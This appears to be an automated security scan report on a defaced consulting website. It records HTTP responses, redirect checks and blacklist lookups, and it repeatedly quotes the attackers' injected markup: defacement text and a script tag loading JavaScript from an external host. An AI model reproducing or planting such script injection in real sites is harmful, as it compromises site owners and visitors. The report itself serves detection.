Scanned pages/files
Request | Server response | Status |
http://www.felberc.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sat, 18 Jul 2015 00:01:05 GMT Pragma: no-cache Location: http://felberc.com/ Server: Apache/2.4.10 (Unix) Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=ft41p346vsi1lhk58v6qlilsk7; path=/ X-Pingback: <html> </head><body alink="gray" bgcolor="black" vlink="gray" link="gray" text="white" charset="utf-8"><center> <title>ICSG</title> <center> <br> <script src="http://s1.upload7.ir/downloads/7OqszdxCChgeP22kZWEGsoNSHeaqFbnD/ic.js"></script>HACKED By Iran-Cyber , Owned By Iran-Cyber , Defaced By iran-cyber , hack by iran-cyber , Hacked By Iran Cyber Security group <br><br> <font size=2 Color=red>Hacked By Iran Cyber Security group<br><br>/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://felberc.com/ | 200 OK Content-Length: 96257 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: HACKED By Iran-Cyber , Owned By Iran-Cyber , Defaced By iran-cyber , hack by iran-cyber , Hacked By ...[456 bytes skipped]... ting" /> <title> Felber Consulting</title> <link href="<html> </head><body alink="gray" bgcolor="black" vlink="gray" link="gray" text="white" charset="utf-8"><center> <title>ICSG</title> <center> <br> <script src="http://s1.upload7.ir/downloads/7OqszdxCChgeP22kZWEGsoNSHeaqFbnD/ic.js"></script>HACKED By Iran-Cyber , Owned By Iran-Cyber , Defaced By iran-cyber , hack by iran-cyber , Hacked By Iran Cyber Security group <br><br> <font size=2 Color=red>Hacked By Iran Cyber Security group<br><br>/wp-content/themes/simplo1/style.css" rel="stylesheet" type="text/css" /> <!-- <link rel="stylesheet" href="/css/blue.css" media="screen" /> <link rel="stylesheet" href="/css/blue.css" media="screen" /> --> <link id="selectedstyle" rel="stylesheet" hr ...[108979 bytes skipped]... | ||
http://s1.upload7.ir/downloads/7OqszdxCChgeP22kZWEGsoNSHeaqFbnD/ic.js | 200 OK Content-Length: 1138 Content-Type: application/x-javascript | clean |
http://www.felberc.com/<html> </head><body alink= | 404 Not Found Content-Length: 318 Content-Type: text/html | clean |
http://www.felberc.com/test404page.js | 404 Not Found Content-Length: 291 Content-Type: text/html | clean |
http://html_/headbody_alink=%22gray%22+bgcolor%3D%22black%22+vlink%3D%22gray%22+link%3D%22gray%22+text%3D%22white%22+charset%3D%22utf-8%22%3E%3Ccenter%3E+%3Ctitle%3EICSG%3C%2Ftitle%3E+%3Ccenter%3E+%3Cbr%3E+%3Cscript+src%3D%22http%3A%2F%2Fs1.upload7.ir%2Fdownloads%2F7OqszdxCChgeP22kZWEGsoNSHeaqFbnD%2Fic.js%22%3E%3C%2Fscript%3EHACKED+By+Iran-Cyber+%2C+Owned+By+Iran-Cyber+%2C+Defaced+By+iran-cyber+%2 <span>...211 symbols skipped</span> | 500 Can't connect to html_:80 Content-Length: 180 Content-Type: text/plain | clean |
http://html_/headbody_alink=%22gray%22+bgcolor%3D%22black%22+vlink%3D%22gray%22+link%3D%22gray%22+text%3D%22white%22+charset%3D%22utf-8%22%3E%3Ccenter%3E+%3Ctitle%3EICSG%3C%2Ftitle%3E+%3Ccenter%3E+%3Cbr%3E+%3Cscript+src%3D%22http%3A%2F%2Fs1.upload7.ir%2Fdownloads%2F7OqszdxCChgeP22kZWEGsoNSHeaqFbnD%2Fic.js%22%3E%3C%2Fscript%3EHACKED+By+Iran-Cyber+%2C+Owned+By+Iran-Cyber+%2C+Defaced+By+iran-cyber+%2 <span>...222 symbols skipped</span> | 500 Can't connect to html_:80 Content-Length: 180 Content-Type: text/plain | clean |
http://html_/headbody_alink=%22gray%22+bgcolor%3D%22black%22+vlink%3D%22gray%22+link%3D%22gray%22+text%3D%22white%22+charset%3D%22utf-8%22%3E%3Ccenter%3E+%3Ctitle%3EICSG%3C%2Ftitle%3E+%3Ccenter%3E+%3Cbr%3E+%3Cscript+src%3D%22http%3A%2F%2Fs1.upload7.ir%2Fdownloads%2F7OqszdxCChgeP22kZWEGsoNSHeaqFbnD%2Fic.js%22%3E%3C%2Fscript%3EHACKED+By+Iran-Cyber+%2C+Owned+By+Iran-Cyber+%2C+Defaced+By+iran-cyber+%2 <span>...241 symbols skipped</span> | 500 Can't connect to html_:80 Content-Length: 180 Content-Type: text/plain | clean |
http://html_/headbody_alink=%22gray%22+bgcolor%3D%22black%22+vlink%3D%22gray%22+link%3D%22gray%22+text%3D%22white%22+charset%3D%22utf-8%22%3E%3Ccenter%3E+%3Ctitle%3EICSG%3C%2Ftitle%3E+%3Ccenter%3E+%3Cbr%3E+%3Cscript+src%3D%22http%3A%2F%2Fs1.upload7.ir%2Fdownloads%2F7OqszdxCChgeP22kZWEGsoNSHeaqFbnD%2Fic.js%22%3E%3C%2Fscript%3EHACKED+By+Iran-Cyber+%2C+Owned+By+Iran-Cyber+%2C+Defaced+By+iran-cyber+%2 <span>...235 symbols skipped</span> | 500 Can't connect to html_:80 Content-Length: 180 Content-Type: text/plain | clean |
http://html_/headbody_alink=%22gray%22+bgcolor%3D%22black%22+vlink%3D%22gray%22+link%3D%22gray%22+text%3D%22white%22+charset%3D%22utf-8%22%3E%3Ccenter%3E+%3Ctitle%3EICSG%3C%2Ftitle%3E+%3Ccenter%3E+%3Cbr%3E+%3Cscript+src%3D%22http%3A%2F%2Fs1.upload7.ir%2Fdownloads%2F7OqszdxCChgeP22kZWEGsoNSHeaqFbnD%2Fic.js%22%3E%3C%2Fscript%3EHACKED+By+Iran-Cyber+%2C+Owned+By+Iran-Cyber+%2C+Defaced+By+iran-cyber+%2 <span>...268 symbols skipped</span> | 500 Can't connect to html_:80 Content-Length: 180 Content-Type: text/plain | clean |
http://html_/headbody_alink=%22gray%22+bgcolor%3D%22black%22+vlink%3D%22gray%22+link%3D%22gray%22+text%3D%22white%22+charset%3D%22utf-8%22%3E%3Ccenter%3E+%3Ctitle%3EICSG%3C%2Ftitle%3E+%3Ccenter%3E+%3Cbr%3E+%3Cscript+src%3D%22http%3A%2F%2Fs1.upload7.ir%2Fdownloads%2F7OqszdxCChgeP22kZWEGsoNSHeaqFbnD%2Fic.js%22%3E%3C%2Fscript%3EHACKED+By+Iran-Cyber+%2C+Owned+By+Iran-Cyber+%2C+Defaced+By+iran-cyber+%2 <span>...288 symbols skipped</span> | 500 Can't connect to html_:80 Content-Length: 180 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: felberc.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 18 Jul 2015 00:01:06 GMT
Pragma: no-cache
Server: Apache/2.4.10 (Unix)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=rv4jk3kblfcdhmipmq9ko1bn47; path=/
X-Pingback: <html> </head><body alink="gray" bgcolor="black" vlink="gray" link="gray" text="white" charset="utf-8"><center> <title>ICSG</title> <center> <br> <script src="http://s1.upload7.ir/downloads/7OqszdxCChgeP22kZWEGsoNSHeaqFbnD/ic.js"></script>HACKED By Iran-Cyber , Owned By Iran-Cyber , Defaced By iran-cyber , hack by iran-cyber , Hacked By Iran Cyber Security group <br><br> <font size=2 Color=red>Hacked By Iran Cyber Security group<br><br>/xmlrpc.php
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: felberc.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 18 Jul 2015 00:01:06 GMT
Pragma: no-cache
Server: Apache/2.4.10 (Unix)
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=rv4jk3kblfcdhmipmq9ko1bn47; path=/
X-Pingback: <html> </head><body alink="gray" bgcolor="black" vlink="gray" link="gray" text="white" charset="utf-8"><center> <title>ICSG</title> <center> <br> <script src="http://s1.upload7.ir/downloads/7OqszdxCChgeP22kZWEGsoNSHeaqFbnD/ic.js"></script>HACKED By Iran-Cyber , Owned By Iran-Cyber , Defaced By iran-cyber , hack by iran-cyber , Hacked By Iran Cyber Security group <br><br> <font size=2 Color=red>Hacked By Iran Cyber Security group<br><br>/xmlrpc.php
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: felberc.com
Referer: http://www.google.com/search?q=felberc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: felberc.com
Referer: http://www.google.com/search?q=felberc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=felberc.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://felberc.com/
Result: felberc.com is not infected or malware details are not published yet.
Result: felberc.com is not infected or malware details are not published yet.